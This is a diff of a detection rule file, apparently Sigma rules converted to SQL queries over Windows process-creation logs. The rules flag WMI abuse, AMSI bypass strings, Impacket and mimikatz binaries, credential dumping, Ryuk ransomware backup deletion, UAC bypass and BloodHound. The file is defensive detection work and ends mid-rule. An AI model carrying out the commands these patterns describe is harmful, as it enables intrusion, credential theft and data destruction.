"id": "8a582fe2-0882-4b89-a82a-da6b2dc32937", "status": "test", - "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects suspicious and uncommon child processes of WmiPrvSE", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng, Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + "attack.t1047", + "attack.t1204.002", + "attack.t1218.010" ], "falsepositives": [ - "Java tools are known to produce false-positive when loading libraries" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'cmd.exe') AND ((ParentCommandLine LIKE '%/c%' ESCAPE '\\' OR ParentCommandLine LIKE '%/k%' ESCAPE '\\' OR ParentCommandLine LIKE '%/r%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/k%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (ParentCommandLine = '/../../' OR CommandLine LIKE '%/../../%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\Tasktop\\\\keycloak\\\\bin\\\\/../../jre\\\\bin\\\\java%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine 
LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\')))) AND NOT ((NewProcessName LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_path_traversal.yml" + "filename": "proc_creation_win_wmiprvse_susp_child_processes.yml" }, { - "title": "Ping Hex IP", - "id": "1a0d4aba-7668-4365-9ce4-6d79ab088dfd", - "status": "test", - "description": "Detects a ping command that uses a hex encoded IP address", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Elevated System Shell", + "id": "178e615d-e666-498b-9630-9ed363038101", + "status": "experimental", + "description": "Detects when a shell program such as the windows Command Prompt or PowerShell is launched with system privileges.", + "author": "frack113, Tim Shelton (update fp)", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1140", - "attack.t1027" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely, because no sane admin pings IP addresses in a hexadecimal form" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ping.exe' ESCAPE '\\' AND CommandLine LIKE '%0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe')) AND ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND SubjectLogonId = '0x3e7')) AND NOT (((ParentProcessName LIKE 
'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\ManageEngine\\\\ADManager Plus\\\\pgsql\\\\bin\\\\postgres.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\' OR 
CommandLine LIKE '%cmd.exe /c btool server list general --no-log' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\system32\\\\reg.exe query hklm\\\\software\\\\microsoft\\\\windows\\\\softwareinventorylogging /v collectionstate /reg:64%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /c PAUSE' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ping_hex_ip.yml" + "filename": "proc_creation_win_susp_elevated_system_shell.yml" }, { - "title": "Potential ACTINIUM Persistence Activity", - "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", - "status": "test", - "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", + "id": "b66474aa-bd92-4333-a16c-298155b120df", + "status": "experimental", + "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. 
This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", + "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_actinium_persistence.yml" + "filename": "proc_creation_win_schtasks_powershell_persistence.yml" }, { - "title": "Suspicious Eventlog Clear or Configuration Change", - "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "status": "stable", - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. 
Might be used by ransomwares during the attack (seen by NotPetya and others).", - "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", + "title": "Disable Important Scheduled Task", + "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "attack.t1562.002", - "car.2016-04-002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Maintenance activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND 
CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_eventlog_clear.yml" + "filename": "proc_creation_win_schtasks_disable.yml" }, { - "title": "Potential AMSI Bypass Via .NET Reflection", - "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "title": "Explorer NOUACCHECK Flag", + "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", "status": "test", - "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", - "author": "Markus Neis, @Kostastsale", + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 
'%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" + "filename": "proc_creation_win_explorer_nouaccheck.yml" }, { - "title": "HackTool - Impacket Tools Execution", - "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", - "status": "test", - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Defense Evasion Via Right-to-Left Override", + "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "status": "experimental", + "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", + "author": "Micah Babinski, @micahbabinski", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion", + "attack.t1036.002" ], "falsepositives": [ - "Legitimate use of the impacket tools" + "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\goldenPac%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\kintercept%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rpcdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\samrdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\secretsdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbexec%' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmiexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%‮%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impacket_tools.yml" + "filename": "proc_creation_win_susp_right_to_left_override.yml" }, { - "title": "Interactive AT Job", - "id": 
"60fc936d-2eb0-4543-8a13-911c750a1dfc", - "status": "test", - "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential Ryuk Ransomware Activity", + "id": "c37510b8-2107-4b78-aa32-72f251e7a844", + "status": "stable", + "description": "Detects Ryuk ransomware activity", + "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely (at.exe deprecated as of Windows 8)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_at_interactive_execution.yml" + "filename": "proc_creation_win_malware_ryuk.yml" }, { - "title": "HackTool - Pypykatz Credentials Dumping Activity", - "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", - "status": "test", - 
"description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", - "author": "frack113", + "title": "Set Suspicious Files as System Files Using Attrib.EXE", + "id": "efec536f-72e8-4656-8960-5e85d091345b", + "status": "experimental", + "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' 
ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_pypykatz.yml" + "filename": "proc_creation_win_attrib_system_susp_paths.yml" }, { - "title": "Root Certificate Installed From Susp Locations", - "id": "5f6a601c-2ecb-498b-9c33-660362323afa", - "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Bloodhound/Sharphound Execution", + "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "status": "test", + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Other programs that use these command line option and accepts an 'All' parameter" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Product LIKE '%SharpHound%' 
ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" + "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" }, { - "title": "Suspicious WERMGR Process Patterns", - "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", - "status": "experimental", - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass Abusing Winsat Path Parsing - Process", + "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE 
'\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wermgr_susp_child_process.yml" + "filename": "proc_creation_win_uac_bypass_winsat.yml" }, { - "title": "Suspicious Curl.EXE Download", - "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "title": "Suspicious Mstsc.EXE Execution With Local RDP File", + "id": "6e22722b-dfb1-4508-a911-49ac840b40f8", "status": "experimental", - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likelihood is related to how often the paths are used in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
